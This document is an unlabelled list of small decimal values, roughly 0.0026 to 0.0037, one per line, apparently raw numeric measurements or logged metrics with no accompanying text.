0.00269016
0.00269472
0.00269483
0.00269005
0.00269479
0.00268992
0.00269478
0.00269015
0.00269483
0.00269472
0.00269006
0.00269996
0.00269472
0.00267462
0.00267984
0.00267987
0.00268464
0.00268464
0.00268472
0.0026798
0.0026798
0.00267468
0.00267006
0.00267468
0.00266983
0.00267472
0.00267462
0.00266996
0.00267468
0.00267006
0.00267468
0.00266983
0.00267462
0.00267472
0.00266996
0.00268
0.00268466
0.00268477
0.00267992
0.0026801
0.00268473
0.00267987
0.00268
0.00268466
0.00268477
0.00267992
0.00268473
0.00267987
0.0026801
0.00267468
0.00266976
0.00266976
0.0026746
0.0026746
0.00266983
0.00267462
0.00267984
0.00269475
0.00269484
0.00269002
0.00268991
0.00269482
0.00269475
0.00268991
0.00269996
0.00270488
0.00270001
0.00270003
0.00270481
0.00269998
0.00270012
0.0027049
0.00270483
0.00270009
0.00270483
0.00269998
0.00269473
0.00268996
0.00269475
0.0026948
0.00268989
0.00269475
0.00269484
0.00269002
0.00268991
0.00269482
0.00269475
0.00268991
0.00269996
0.00270488
0.0027
0.00270481
0.00270003
0.00269998
0.00270012
0.0027049
0.00270483
0.00270483
0.00270009
0.00269998
0.00269473
0.00268996
0.00269475
0.0026948
0.00268989
0.00267985
0.00268476
0.00268469
0.00267999
0.00268469
0.00267996
0.00267986
0.00267463
0.00267465
0.00266987
0.00267469
0.0026698
0.00267984
0.00268474
0.00267988
0.00268467
0.0026799
0.00267465
0.00267473
0.00266993
0.00266983
0.00267471
0.00267465
0.00266982
0.00267985
0.00268476
0.00268469
0.00267999
0.00268469
0.00267996
0.00267986
0.00267463
0.00267465
0.00266986
0.00267469
0.0026698
0.00267984
0.00268474
0.00267988
0.00268467
0.0026799
0.00267465
0.00267473
0.00266993
0.00266983
0.00267471
0.00267465
0.00266982
0.00269996
0.00269472
0.00269996
0.00269472
0.00267987
0.00268464
0.00268464
0.00268472
0.00267979
0.00267979
0.00267468
0.00267006
0.00267468
0.00266983
0.00266996
0.00267472
0.00267461
0.00267468
0.00267006
0.00267468
0.00266983
0.00266996
0.00267472
0.00267461
0.00268
0.00268466
0.00268477
0.00267992
0.00268473
0.0026801
0.00267987
0.00268
0.00268466
0.00268477
0.00267992
0.00268473
0.0026801
0.00267987
0.00267468
0.00266976
0.00266976
0.00266983
0.0026746
0.0026746
0.00267462
0.00267984
0.00267462
0.00267984
0.00265977
0.00265458
0.00265978
0.00265458
0.00265464
0.00264974
0.00264974
0.00265456
0.00265456
0.0026498
0.00265994
0.00266469
0.00266459
0.00265986
0.00266465
0.00265981
0.00266004
0.00265994
0.00266469
0.00266459
0.00265986
0.00266465
0.00265981
0.00266004
0.00265981
0.00266457
0.00266457
0.00266465
0.00265974
0.00265974
0.00265464
0.00264981
0.00265463
0.00265003
0.00265458
0.00264993
0.00265468
0.00265464
0.00264981
0.00265464
0.00265003
0.00265458
0.00264993
0.00265468
0.00265461
0.00265469
0.0026498
0.0026499
0.00265461
0.00265467
0.0026498
0.00265978
0.00266466
0.00265983
0.0026646
0.00265985
0.0026598
0.00265993
0.00266462
0.00266468
0.00265981
0.00266462
0.0026599
0.0026546
0.00264984
0.00265462
0.00265466
0.00264978
0.00265464
0.00264974
0.00264974
0.00265456
0.00265456
0.0026498
0.00265994
0.00266469
0.00266459
0.00265986
0.00265981
0.00266465
0.00266004
0.00265994
0.00266469
0.00266459
0.00265986
0.00266004
0.00266465
0.00265981
0.00265981
0.00266458
0.00266457
0.00265973
0.00266465
0.00265974
0.00265464
0.00264981
0.00265464
0.00265003
0.00265457
0.00265468
0.00264993
0.00265464
0.00264981
0.00265463
0.00265003
0.00265468
0.00265458
0.00264993
0.00265978
0.00265458
0.00265978
0.00266466
0.00265982
0.0026646
0.00265985
0.0026598
0.00265993
0.00266462
0.00266468
0.00265981
0.00266462
0.00265991
0.00265461
0.00265469
0.0026499
0.0026498
0.00265467
0.00265461
0.0026498
0.00265978
0.00266467
0.00265982
0.00265984
0.0026646
0.0026598
0.00265993
0.00266468
0.00266462
0.0026599
0.00266462
0.00265981
0.00265459
0.00264984
0.00265461
0.00265465
0.00264978
0.00265461
0.00265469
0.0026498
0.0026499
0.00265461
0.00265467
0.0026498
0.00265978
0.00266466
0.00265982
0.0026646
0.00265984
0.0026598
0.00265993
0.00266462
0.00266468
0.00266462
0.00265981
0.0026599
0.00265459
0.00264984
0.00265461
0.00265465
0.00264978
0.00265994
0.00266469
0.00266459
0.00265986
0.00265981
0.00266465
0.00266004
0.00265994
0.00266469
0.00266459
0.00265986
0.00266004
0.00266465
0.00265981
0.00265981
0.00266457
0.00266457
0.00265974
0.00266465
0.00265974
0.00265978
0.00265461
0.00265469
0.0026499
0.0026498
0.00265467
0.00265461
0.0026498
0.00265978
0.00266467
0.00265982
0.00265984
0.0026646
0.0026598
0.00265993
0.00266468
0.00266462
0.00265991
0.00266462
0.00265981
0.00265461
0.00265469
0.0026499
0.0026498
0.00265467
0.00265461
0.0026498
0.00265978
0.00266467
0.00265982
0.0026646
0.00265984
0.0026598
0.00265993
0.00266468
0.00266462
0.00266462
0.0026599
0.00265981
0.00265459
0.00264984
0.00265461
0.00265465
0.00264978
0.00265978
0.00265458
0.00265978
0.00265458
0.00363766
0.00364241
0.00364034
0.00363036
0.00365294
0.00363236
0.00363491
0.00363776
0.00364243
0.00364044
0.00363045
0.00365322
0.00363245
0.00363501
0.00363775
0.00364239
0.0036404
0.00363043
0.00365315
0.00363501
0.00363242
0.00363765
0.00364224
0.0036403
0.00363032
0.00365299
0.00363484
0.00363233
0.00364114
0.00364096
0.0036311
0.00362998
0.00361922
0.00364069
0.0036408
0.00363085
0.00363002
0.00361908
0.00362776
0.00363061
0.00364355
0.00362889
0.00363609
0.00362804
0.00362606
0.00362745
0.00363035
0.00364338
0.00362862
0.00363589
0.00362628
0.00362773
0.00363769
0.00364227
0.0036403
0.00363036
0.00365268
0.00363235
0.00363492
0.00363773
0.0036424
0.00364043
0.00363043
0.00365286
0.00363243
0.00363497
0.003641
0.00364081
0.00363086
0.00361905
0.00362986
0.00364098
0.00364092
0.00363115
0.00363013
0.00361931
0.00362749
0.00363037
0.00364339
0.0036286
0.00363587
0.00362774
0.00362629
0.00362754
0.00363039
0.00364338
0.00362865
0.00363591
0.00362631
0.00362779
0.00362779
0.00363062
0.00364354
0.00362892
0.00363608
0.00362813
0.00362606
0.00362724
0.00363046
0.00364319
0.0036287
0.00363574
0.00362575
0.00362773
0.00363769
0.00364232
0.00364035
0.00363038
0.00365314
0.00363237
0.00363494
0.00363768
0.00364231
0.00364037
0.00363039
0.0036528
0.00363238
0.00363493
0.00364107
0.00364082
0.00363093
0.00361908
0.00363007
0.00364117
0.00364095
0.00363091
0.00362996
0.00361915
0.00362751
0.00363041
0.00364349
0.00362865
0.00363591
0.00362781
0.00362633
0.00362776
0.00363062
0.00364358
0.00362891
0.00363611
0.00362605
0.00362808
0.00364079
0.00364068
0.00363101
0.003619
0.00363008
0.00364127
0.00364099
0.00363114
0.00361927
0.00363007
0.00363729
0.00362808
0.00363036
0.00362811
0.00363725
0.00363043
0.00363709
0.00362802
0.00363029
0.00363725
0.00362801
0.00363028
0.00362807
0.00363709
0.00363037
0.00363692
0.00362796
0.00363022
0.00362807
0.00363717
0.0036304
0.00362807
0.00363732
0.00363038
0.00366839
0.0036631
0.00364765
0.00365772
0.00365044
0.00366839
0.00366298
0.00364765
0.00365771
0.0036505
0.00364119
0.00364886
0.00367226
0.0036479
0.00365891
0.00365262
0.00364104
0.00364128
0.00364877
0.00367219
0.003648
0.00365966
0.00365261
0.00364119
0.0036677
0.00366563
0.0036476
0.00365762
0.00365048
0.00366818
0.00366281
0.00364764
0.00365764
0.00365046
0.00364127
0.00364866
0.00367864
0.00364789
0.00365958
0.00365247
0.00364132
0.00364119
0.00364868
0.00367194
0.00364789
0.00365934
0.00365253
0.00364106
0.0036276
0.0036395
0.00364029
0.00362873
0.00363358
0.00363502
0.00363025
0.00362747
0.00363819
0.00364046
0.00362834
0.00363343
0.00363508
0.00363067
0.00362536
0.0036295
0.00363396
0.00361478
0.00362913
0.00361468
0.00362661
0.00362779
0.00363506
0.00363439
0.00363268
0.00361431
0.00362617
0.00362195
0.00363691
0.00364299
0.00363562
0.00362209
0.00363484
0.00364011
0.0036176
0.00362528
0.00362949
0.00363399
0.00361483
0.00362908
0.00362661
0.00361476
0.00362759
0.00363531
0.00363445
0.00363263
0.0036143
0.00362493
0.00362162
0.00363676
0.00364282
0.00363527
0.00362175
0.00363525
0.00363999
0.0036169
0.00366773
0.00366341
0.00364753
0.00365774
0.00365035
0.00366777
0.00366291
0.00364762
0.00365766
0.00365035
0.00364125
0.00364852
0.00367242
0.0036479
0.00365927
0.00365267
0.00364119
0.00364126
0.00364877
0.00367212
0.00364788
0.00365944
0.00365255
0.00364119
0.0036275
0.00363935
0.00364023
0.00362855
0.00363345
0.00363483
0.00363017
0.00362762
0.00363898
0.00364055
0.00362848
0.00363363
0.00363061
0.00363496
0.00362534
0.00362957
0.00363441
0.00361477
0.00362933
0.00361471
0.0036266
0.00362735
0.0036355
0.0036358
0.00363326
0.00362827
0.00361437
0.0036217
0.00363677
0.00364273
0.00363528
0.00362163
0.0036355
0.00363993
0.00361552
0.00362535
0.00362953
0.00363419
0.00361476
0.00362918
0.00362661
0.00361478
0.00362783
0.00363543
0.00363457
0.00363273
0.00361431
0.00362545
0.00362183
0.00363669
0.00364275
0.00363541
0.00362197
0.00363533
0.00364007
0.00361753
0.00362529
0.00362943
0.00363401
0.00361472
0.00362908
0.00361468
0.00362653
0.00362766
0.0036343
0.00363519
0.00363262
0.00362583
0.00361434
0.00362195
0.00363683
0.00364284
0.00363575
0.00362199
0.00363482
0.00363993
0.00361734
0.00362519
0.00362939
0.0036339
0.00361467
0.00362894
0.00362651
0.00361449
0.00362735
0.00363499
0.00363378
0.00363235
0.00361412
0.00362419
0.00362012
0.0036364
0.00364226
0.00363512
0.0036244
0.00363398
0.00363937
0.00361412
0.00366822
0.00366272
0.00364756
0.00365758
0.0036502
0.00366829
0.00366307
0.00364757
0.00365762
0.00365031
0.00364121
0.00364869
0.00367177
0.00364786
0.00365955
0.00365248
0.00364113
0.00364121
0.00364855
0.00367209
0.00364786
0.00365937
0.00365252
0.00364112
0.00362767
0.00363905
0.00364037
0.00362854
0.00363358
0.00363499
0.00363072
0.00362758
0.00363925
0.0036404
0.00362854
0.00363356
0.00363051
0.00363491
0.00362536
0.0036295
0.003634
0.00361483
0.00362909
0.00361467
0.00362663
0.00362771
0.00363402
0.00363517
0.00363256
0.00362548
0.00361427
0.00362179
0.00363692
0.00364275
0.00363539
0.0036218
0.0036343
0.00363993
0.00361733
0.00362529
0.00362951
0.00363407
0.00361477
0.00362914
0.00362662
0.00361476
0.0036276
0.00363421
0.00363523
0.00363264
0.00362499
0.00361435
0.00362192
0.00363693
0.00364295
0.00363566
0.00362205
0.0036347
0.00364012
0.00361779
0.00362749
0.00363836
0.00364059
0.00362855
0.00363357
0.00363081
0.00363522
0.00362755
0.00363959
0.0036405
0.00362881
0.00363367
0.00363054
0.0036352
0.00363644
0.00364407
0.0036482
0.0036375
0.00364327
0.00365461
0.00366712
0.00364528
0.003647
0.00364715
0.00366084
0.00366214
0.00363642
0.00364401
0.00364811
0.00363751
0.00364321
0.00365472
0.00366709
0.00364533
0.00364704
0.00364729
0.00366207
0.00366229
0.00364529
0.00364708
0.00364741
0.00366205
0.00366221
0.00364554
0.00364699
0.00364735
0.00366187
0.00366214
0.00363638
0.00364399
0.00364797
0.00363742
0.0036431
0.00365447
0.00366701
0.00364549
0.00364715
0.00364751
0.00366109
0.00366239
0.0036364
0.00364403
0.00364805
0.00363744
0.0036432
0.00365449
0.00366702
0.00363645
0.00364411
0.00364823
0.00363752
0.00364329
0.00365463
0.00366713
0.00363627
0.00364398
0.00364794
0.00363736
0.0036429
0.00365435
0.00366697
0.00364525
0.00364708
0.00364738
0.00366102
0.00366226
0.00363644
0.00364407
0.0036481
0.00363752
0.0036432
0.00365462
0.00366706
0.00363646
0.00364411
0.00364828
0.00363753
0.00364327
0.00365466
0.00366714
0.00364565
0.00364703
0.0036473
0.00366217
0.00366223
0.00364541
0.00364713
0.00364755
0.00366213
0.00366222
0.00367426
0.00364149
0.00364443
0.00364443
0.0036513
0.00365131
0.0036537
0.00367405
0.00364143
0.00364439
0.00364439
0.00365122
0.00365124
0.0036537
0.00364531
0.00363529
0.00364385
0.00363392
0.00362774
0.00364575
0.00363289
0.00364345
0.00363456
0.00362792
0.0036458
0.00363231
0.00364351
0.00363454
0.00362917
0.00363542
0.00363133
0.00361903
0.00363566
0.00362132
0.00362762
0.00363371
0.00363751
0.00363573
0.00363361
0.00362916
0.00363544
0.00363117
0.00361895
0.0036356
0.00362767
0.00362124
0.00363369
0.00363734
0.00363583
0.00363387
0.00367405
0.00364146
0.00364436
0.00364437
0.00365129
0.00365126
0.00365365
0.00364512
0.0036351
0.00362781
0.00364564
0.00363259
0.00364331
0.00363451
0.00362779
0.00364592
0.00363356
0.00364319
0.00363425
0.00364401
0.00363561
0.00362925
0.00363554
0.00363145
0.00361901
0.00363577
0.00362132
0.00362766
0.00363472
0.00363843
0.00363655
0.00363401
0.00362921
0.00363551
0.00363145
0.00361908
0.00363572
0.00362765
0.00362132
0.0036337
0.00363779
0.00363592
0.00363285
0.00362911
0.00363538
0.00363131
0.00361884
0.00363561
0.00362119
0.00362752
0.00363371
0.00363731
0.0036357
0.00363432
0.00362903
0.00363539
0.00363121
0.00361888
0.00363552
0.00362757
0.00362118
0.003633
0.00363786
0.00363535
0.00363318
0.00367409
0.00364142
0.00364435
0.00364435
0.00365121
0.00365122
0.00365362
0.00364419
0.00363596
0.0036278
0.00364569
0.00363267
0.00364324
0.00363463
0.00362778
0.00364579
0.0036335
0.00364327
0.0036343
0.00364458
0.00363565
0.00362912
0.00363544
0.00363125
0.00361893
0.00363561
0.00362114
0.00362759
0.00363313
0.00363688
0.00363517
0.00363208
0.00362918
0.00363545
0.00363135
0.00361902
0.00363566
0.0036276
0.00362133
0.00363342
0.00363728
0.00363556
0.00363279
0.00362776
0.00364587
0.00363282
0.00364359
0.00363471
0.00362773
0.00364579
0.00363299
0.00364355
0.00363471
0.00364351
0.00363518
0.00364529
0.00363559
0.00363959
0.00364249
0.00364294
0.00363809
0.0036394
0.00364201
0.00364275
0.00363784
0.0036395
0.00364236
0.00364278
0.00363806
0.00363959
0.00364259
0.003643
0.00363818
0.00363951
0.00364264
0.00364302
0.00363798
0.00363957
0.00364273
0.00364306
0.00363815
0.00363942
0.0036424
0.00364287
0.00363789
0.00363967
0.0036426
0.00364306
0.00363826
0.00363655
0.00364017
0.00363759
0.0036437
0.00365501
0.00365861
0.0036421
0.00364076
0.00363856
0.00363795
0.00364471
0.00366027
0.00365116
0.00364382
0.0036468
0.00366276
0.00365117
0.00363869
0.00364568
0.00366193
0.00365387
0.00364973
0.00367059
0.00363668
0.00364034
0.00363778
0.0036439
0.00365454
0.00365882
0.00364219
0.00363903
0.00364097
0.00363825
0.00364495
0.00365156
0.00366052
0.00364379
0.00364671
0.00366292
0.00365119
0.00363911
0.00364562
0.00366218
0.00365429
0.00365005
0.00367112
0.0036498
0.00367107
0.00365112
0.00367052
0.00363656
0.00364015
0.00363757
0.00364367
0.00365305
0.00364211
0.00365854
0.00364078
0.00363907
0.00363797
0.00364466
0.00366025
0.00365055
0.0036435
0.00364664
0.00366258
0.00365113
0.0036393
0.00364555
0.00366172
0.00365193
0.00365011
0.00367078
0.00363663
0.00364015
0.00363767
0.00364374
0.00365549
0.00364217
0.00365869
0.00364072
0.00363919
0.00363804
0.00364471
0.00366036
0.00365021
0.00364361
0.00364674
0.00366259
0.00365111
0.00363929
0.00364563
0.00366175
0.00365176
0.0036365
0.00363997
0.00363755
0.00364367
0.00365378
0.00365854
0.00364205
0.00363852
0.00364063
0.00363791
0.00364468
0.00365118
0.00366021
0.00364392
0.00364679
0.00366276
0.00365124
0.00363864
0.00364564
0.00366194
0.00365397
0.00363647
0.00363988
0.00363744
0.00364356
0.00365279
0.00364205
0.00365837
0.00364034
0.00363859
0.00363768
0.00364454
0.00366
0.00365087
0.00364348
0.00364625
0.00366243
0.00365099
0.00363899
0.00364503
0.00366162
0.00365392
0.00364987
0.00367062
0.00363656
0.00364001
0.00363755
0.00364369
0.00365438
0.00365848
0.0036421
0.00363847
0.00364055
0.00363786
0.0036447
0.00365064
0.0036601
0.00364367
0.0036467
0.0036627
0.00365123
0.00363838
0.00364558
0.00366188
0.00365373
0.00363658
0.0036402
0.00363762
0.00364377
0.00365532
0.00364212
0.00365877
0.00363847
0.00364066
0.00363795
0.0036448
0.00365068
0.00366056
0.00364401
0.00364675
0.00366277
0.00365119
0.0036383
0.00364552
0.00366194
0.00365387
0.00365076
0.00367062
0.00365001
0.00367119
0.00365451
0.00367295
0.00365429
0.00366688
0.00367537
0.00365727
0.00364847
0.00367198
0.00366469
0.00367796
0.00365533
0.00365459
0.00365489
0.00366253
0.00365069
0.00365453
0.00367297
0.00365428
0.00366692
0.00367538
0.00365725
0.00364876
0.00367229
0.0036648
0.00367783
0.00365533
0.00365454
0.00365493
0.00366252
0.00365069
0.00366069
0.00366501
0.00367634
0.0036699
0.00366868
0.00366926
0.00366356
0.00365397
0.00365149
0.0036552
0.00366841
0.00364966
0.00366097
0.00365716
0.00366063
0.00366544
0.00367533
0.00366986
0.00366955
0.00366916
0.00366373
0.0036541
0.00365177
0.00365608
0.00366794
0.00364994
0.00366166
0.00365714
0.0036544
0.00367278
0.00365409
0.00366673
0.00367531
0.00365714
0.00364835
0.00367253
0.00366474
0.00367768
0.00365544
0.0036546
0.0036549
0.00366252
0.00365074
0.00365449
0.00367285
0.00365408
0.00366679
0.00367531
0.00365728
0.0036484
0.00367224
0.00366478
0.00367777
0.00365543
0.0036546
0.0036549
0.00366252
0.00365062
0.00366008
0.00366449
0.00367632
0.00366956
0.00366902
0.00366789
0.00366349
0.00365392
0.00365172
0.00365591
0.00366797
0.00364987
0.00366136
0.00365709
0.00366047
0.00366527
0.00367499
0.00366978
0.00367017
0.00366928
0.00366373
0.00365401
0.00365156
0.00365612
0.00366763
0.00364988
0.00366157
0.00365698
0.00365455
0.00367286
0.0036542
0.00366687
0.00367539
0.00365745
0.00364866
0.00367215
0.00366487
0.00367814
0.00365535
0.0036548
0.00365486
0.00366255
0.00365061
0.0036545
0.00367287
0.00365421
0.00366691
0.0036754
0.00365728
0.00364882
0.00367231
0.00366492
0.0036777
0.00365529
0.00365479
0.00365485
0.00366252
0.00365065
0.00366081
0.0036652
0.00367673
0.00367
0.00366886
0.00366939
0.00366377
0.00365402
0.00365164
0.00365574
0.00366799
0.0036498
0.00366106
0.00365718
0.00366054
0.00366535
0.00367518
0.00366984
0.00366979
0.00366912
0.00366372
0.00365408
0.00365169
0.0036561
0.00366769
0.00364993
0.00366173
0.00365706
0.0036544
0.00367283
0.00365407
0.00366673
0.00367527
0.00365711
0.00364847
0.00367215
0.00366472
0.00367765
0.00365535
0.00365469
0.00365474
0.00366245
0.00365052
0.00365442
0.00367287
0.00365407
0.00366684
0.00367528
0.00365722
0.00364879
0.00367229
0.00366487
0.00367768
0.0036552
0.00365452
0.0036548
0.0036624
0.00365057
0.00366051
0.00366522
0.00367497
0.00366968
0.00366968
0.00366916
0.00366363
0.00365402
0.00365168
0.00365605
0.00366774
0.00364988
0.00366166
0.00365704
0.00366044
0.00366527
0.00367508
0.00366977
0.00366969
0.003669
0.00366362
0.00365402
0.00365163
0.00365606
0.00366755
0.00364985
0.0036618
0.00365698
0.00363315
0.00363243
0.00363751
0.00363548
0.00364014
0.00365207
0.00364491
0.00363314
0.00363253
0.00363778
0.00363553
0.00364018
0.00365228
0.00364536
0.00363304
0.00363233
0.00363757
0.00363539
0.00364002
0.00365194
0.00364443
0.00363306
0.00363232
0.00363757
0.00363539
0.00364005
0.00365196
0.00364437
0.00363314
0.00363246
0.0036376
0.00363551
0.00364015
0.00365212
0.00364499
0.00363298
0.00363235
0.00363751
0.00363536
0.00363983
0.00365186
0.00364479
0.00363311
0.00363249
0.00363759
0.00363551
0.00364005
0.00365217
0.00364515
0.00363315
0.00363248
0.00363752
0.00363553
0.00364011
0.00365216
0.00364506
0.00365316
0.00365827
0.00367125
0.00366219
0.00365726
0.00365345
0.00366793
0.00366969
0.00364955
0.00364727
0.00364995
0.00367193
0.00366263
0.00366228
0.00366542
0.00366609
0.00366644
0.00364196
0.00365311
0.0036582
0.0036712
0.00366218
0.00365718
0.00365342
0.0036679
0.0036698
0.00365111
0.00364801
0.00365208
0.00367206
0.00366273
0.00366218
0.00366517
0.00366626
0.00366682
0.00364215
0.00367001
0.00365098
0.0036481
0.00365135
0.0036721
0.00366279
0.00366236
0.00366574
0.00366624
0.0036668
0.003642
0.00366962
0.00365105
0.00364777
0.00365189
0.00367192
0.00366269
0.00366228
0.00366561
0.00366612
0.00366673
0.00364184
0.00365301
0.00365813
0.0036711
0.00366204
0.00365711
0.00365332
0.00366777
0.00366968
0.00365006
0.00364754
0.003651
0.00367211
0.0036628
0.00366232
0.00366534
0.00366632
0.00366671
0.00364217
0.00365306
0.00365816
0.00367108
0.00366206
0.00365719
0.00365335
0.0036678
0.00365317
0.00365825
0.0036712
0.00366219
0.00365729
0.00365346
0.00366791
0.00365296
0.00365813
0.00367106
0.00366194
0.00365711
0.00365327
0.00366767
0.0036696
0.00365011
0.00364754
0.00365093
0.00367197
0.00366269
0.00366218
0.00366509
0.0036662
0.00366657
0.00364193
0.00365311
0.00365818
0.0036711
0.00366214
0.00365721
0.0036534
0.00366786
0.00365319
0.00365829
0.00367127
0.00366221
0.00365729
0.00365349
0.00366795
0.00366998
0.00365146
0.00364854
0.00365229
0.00367212
0.00366274
0.00366228
0.00366573
0.0036662
0.00366692
0.00364208
0.0036698
0.00365114
0.00364808
0.00365201
0.0036721
0.0036628
0.00366238
0.00366573
0.00366626
0.00366687
0.00364199
0.0036631
0.00364493
0.00365354
0.0036602
0.00364569
0.00366041
0.00366238
0.00366261
0.00364561
0.00366228
0.00365674
0.00364459
0.00366278
0.0036616
0.00365793
0.00365593
0.00365341
0.00365039
0.0036662
0.00364719
0.00366264
0.00367557
0.00363572
0.00366352
0.00366586
0.00364105
0.00366753
0.0036578
0.00366344
0.00367269
0.0036558
0.00366277
0.00364686
0.00365204
0.00366639
0.00364305
0.0036402
0.00364426
0.0036556
0.00364399
0.00365495
0.00364446
0.00364257
0.00364098
0.00364519
0.00365411
0.00365178
0.00364435
0.00364773
0.00366568
0.00366438
0.00365922
0.00366276
0.00365646
0.00365831
0.00367007
0.00365828
0.0036486
0.00365533
0.00366603
0.00366115
0.00364983
0.00366928
0.00368198
0.00364526
0.00366572
0.00368542
0.00366625
0.0036359
0.00367646
0.00365981
0.00369079
0.0036633
0.00364534
0.00365352
0.00366033
0.00364595
0.00366054
0.0036627
0.00366282
0.00364584
0.00366251
0.00365693
0.00364486
0.00366302
0.00366178
0.00365885
0.00365625
0.00365328
0.00365066
0.00366671
0.00364757
0.00366296
0.00367597
0.00363629
0.00366385
0.00366633
0.00364131
0.00366767
0.003658
0.00366354
0.00367277
0.00365604
0.00366296
0.00364682
0.00365208
0.00366639
0.00364386
0.00364025
0.003644
0.00365565
0.0036443
0.00365554
0.00364454
0.00364251
0.0036409
0.00364507
0.00365388
0.00365178
0.00364433
0.00364772
0.00366625
0.00366465
0.0036597
0.003663
0.00365692
0.00365863
0.00367023
0.00366028
0.00364929
0.00365649
0.00366747
0.00366162
0.0036508
0.00367063
0.00367801
0.00364694
0.00366599
0.00368452
0.00366716
0.00363624
0.00367667
0.00366044
0.00369035
0.00367873
0.00364724
0.00366583
0.0036846
0.00366703
0.0036362
0.00367667
0.00366038
0.00369047
0.00367768
0.00364519
0.00366597
0.00368367
0.0036672
0.00363541
0.00367733
0.00366035
0.00369128
0.00366317
0.00364522
0.00366014
0.00365307
0.00364577
0.00366291
0.00366034
0.00366261
0.00364558
0.00366224
0.00365664
0.00364458
0.00366276
0.00366155
0.003658
0.00365838
0.0036527
0.00365157
0.00366624
0.00364729
0.00366263
0.00367559
0.00363584
0.00366353
0.0036658
0.00364099
0.00366737
0.00366325
0.00365755
0.00367253
0.00365567
0.00366247
0.00364676
0.00365188
0.00366622
0.00364296
0.00364014
0.00364268
0.00365616
0.0036441
0.00365544
0.00364459
0.00364243
0.003641
0.00364511
0.00365341
0.00365157
0.00364399
0.00364745
0.00366544
0.00366425
0.00365912
0.00366239
0.00365636
0.00365811
0.00366915
0.00366004
0.00364712
0.00365589
0.00366602
0.00365559
0.00365043
0.00366972
0.00367826
0.00364697
0.00366623
0.00368448
0.00366767
0.00363693
0.00367683
0.00366042
0.00369126
0.0036632
0.00364516
0.00366036
0.00365374
0.00364586
0.00366247
0.00366054
0.00366272
0.00364575
0.00366237
0.00365687
0.00364472
0.0036629
0.0036617
0.00365961
0.00365955
0.00365094
0.00365314
0.00366683
0.00364748
0.00366278
0.00367584
0.00363627
0.00366372
0.00366604
0.00364097
0.00366739
0.00366329
0.00365753
0.00367255
0.0036556
0.00366252
0.00364676
0.00365194
0.00366627
0.00364292
0.00363977
0.00364105
0.00365685
0.00364417
0.0036553
0.00364478
0.00364259
0.00364103
0.00364525
0.00365344
0.00365169
0.00364405
0.00364771
0.00366536
0.00366422
0.00365918
0.00366243
0.00365633
0.00365801
0.00366932
0.00365972
0.00364684
0.00365594
0.00366653
0.00365457
0.00365029
0.0036701
0.0036631
0.00364515
0.00365318
0.00366006
0.00364574
0.00366029
0.00366258
0.00366259
0.0036456
0.00366223
0.00365664
0.00364462
0.00366274
0.00366152
0.00365792
0.00365594
0.00365332
0.00365061
0.00366621
0.00364726
0.0036626
0.00367553
0.00363575
0.00366352
0.00366581
0.00364108
0.00366755
0.00366346
0.00365774
0.00367269
0.00365577
0.00366281
0.00364683
0.00365209
0.00366638
0.00364268
0.0036401
0.00364367
0.00365523
0.00364383
0.00365477
0.00364425
0.00364246
0.00364099
0.00364498
0.00365377
0.00365176
0.00364419
0.00364778
0.00366581
0.00366445
0.00365934
0.00366265
0.00365656
0.00365831
0.00366997
0.00365919
0.00364864
0.0036558
0.00366601
0.00366122
0.00365017
0.00366959
0.00366308
0.00364523
0.00366003
0.00365305
0.00364576
0.00366288
0.00366025
0.00366249
0.00364547
0.00366209
0.00365658
0.00364453
0.00366262
0.00366144
0.00365782
0.00365568
0.00365316
0.00365131
0.0036662
0.00364711
0.00366242
0.0036753
0.00363575
0.00366336
0.00366561
0.00364079
0.00366725
0.0036573
0.00366307
0.00367237
0.00365555
0.00366222
0.00364661
0.00365173
0.00366609
0.00364384
0.00364042
0.00364336
0.00365341
0.00364313
0.00365279
0.00364348
0.00364142
0.0036402
0.00364293
0.00365281
0.00365132
0.00364367
0.00364697
0.00366617
0.00366422
0.00365915
0.00366228
0.00365642
0.00365828
0.00366844
0.00366313
0.00364852
0.00365637
0.00366406
0.0036621
0.00365117
0.0036669
0.00367801
0.00364688
0.00366621
0.00368383
0.00366772
0.00363676
0.00367666
0.00366018
0.00369108
0.00366315
0.00364518
0.00365342
0.0036602
0.0036458
0.00366039
0.00366257
0.00366258
0.00364554
0.00366218
0.00365672
0.00364459
0.0036627
0.00366155
0.00365818
0.00365493
0.00365098
0.00364962
0.00366621
0.00364714
0.0036625
0.00367548
0.00363563
0.00366342
0.00366554
0.0036412
0.00366759
0.00366343
0.00365771
0.00367271
0.00365593
0.00366281
0.00364682
0.00365206
0.00366635
0.00364272
0.00364002
0.00364282
0.00365555
0.00364387
0.00365416
0.00364505
0.00364241
0.00364099
0.00364488
0.00365323
0.00365155
0.00364417
0.00364747
0.00366613
0.00366444
0.00365928
0.00366252
0.00365707
0.00365851
0.0036699
0.00365996
0.00364899
0.0036564
0.00367022
0.00365973
0.00365184
0.00367192
0.00366316
0.00364501
0.00366026
0.00365368
0.00364578
0.00366239
0.00366049
0.00366271
0.00364575
0.00366244
0.00365688
0.0036447
0.00366293
0.0036617
0.00366054
0.00365774
0.00365207
0.00365137
0.00366721
0.0036476
0.00366299
0.00367596
0.00363644
0.00366385
0.00366673
0.0036411
0.00366757
0.00365775
0.00366346
0.00367271
0.00365581
0.00366282
0.00364685
0.00365207
0.00366642
0.00364212
0.00363953
0.00364294
0.0036552
0.00364369
0.00365438
0.00364431
0.0036422
0.00364075
0.00364461
0.00365314
0.0036517
0.00364403
0.00364759
0.00366616
0.00366453
0.00365947
0.00366256
0.00365677
0.00365838
0.00366929
0.00366138
0.0036486
0.00365659
0.00366689
0.0036603
0.00365099
0.00366922
0.00368085
0.00364298
0.0036631
0.0036864
0.00366399
0.00363137
0.00368152
0.00365737
0.003699
0.00367826
0.00364759
0.00366602
0.00368472
0.00366714
0.0036364
0.00367677
0.00366048
0.00369061
0.00356782
0.00356783
0.00355338
0.00356719
0.00355358
0.00355358
0.00355366
0.0035575
0.00357056
0.00357055
0.00356351
0.0035688
0.00356089
0.00356088
0.00351462
0.00351462
0.00350207
0.00350206
0.00350206
0.00350208
0.00351466
0.00351193
0.0035175
0.0035175
0.00351221
0.00351781
0.00351206
0.00351206
0.0034634
0.0034634
0.00345039
0.00345041
0.00345041
0.00345043
0.00346341
0.00346026
0.00346611
0.00346611
0.00346075
0.00346635
0.00346045
0.00346045
0.00341152
0.00341152
0.0033986
0.00339864
0.00339864
0.00339868
0.00341155
0.00340818
0.00341402
0.00341402
0.00340878
0.00341419
0.0034084
0.0034084
0.00336044
0.00336044
0.00334784
0.00334788
0.00334788
0.00334793
0.00336049
0.00335715
0.00336284
0.00336284
0.00335776
0.00336298
0.00335735
0.00335735
0.00331073
0.00331073
0.00329849
0.00329853
0.00329853
0.00329858
